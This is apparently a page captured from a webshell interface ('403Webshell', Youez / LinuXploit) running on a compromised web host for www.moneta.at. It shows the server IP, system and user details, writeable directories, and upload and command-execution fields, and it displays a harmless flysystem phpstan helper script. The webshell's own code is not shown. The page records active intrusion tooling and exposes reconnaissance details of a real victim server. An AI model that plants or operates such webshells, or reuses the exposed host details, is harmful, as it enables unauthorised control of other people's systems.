403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/vendor/league/flysystem/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/vendor/league/flysystem/phpstan.php
<?php
if (PHP_VERSION_ID < 70100) {
    echo "To use PHPStan, PHP version must be 7.1 or higher";
    exit(0);
}

$phpstanURL = 'https://raw.githubusercontent.com/phpstan/phpstan-shim/0.11.8/phpstan.phar';

if (file_exists('./phpstan.phar') === false) {
    echo "phpstan.phar doesn't exist, downloading from $phpstanURL\n";
    $phpstanFile = fopen($phpstanURL, 'rb');
    file_put_contents('./phpstan.phar', $phpstanFile);
    chmod('./phpstan.phar', 0755);
    fclose($phpstanFile);
}

$exec = './phpstan.phar analyse -a vendor/autoload.php -l 5 src';
echo $exec . "\n";
passthru($exec);

Youez - 2016 - github.com/yon3zu
LinuXploit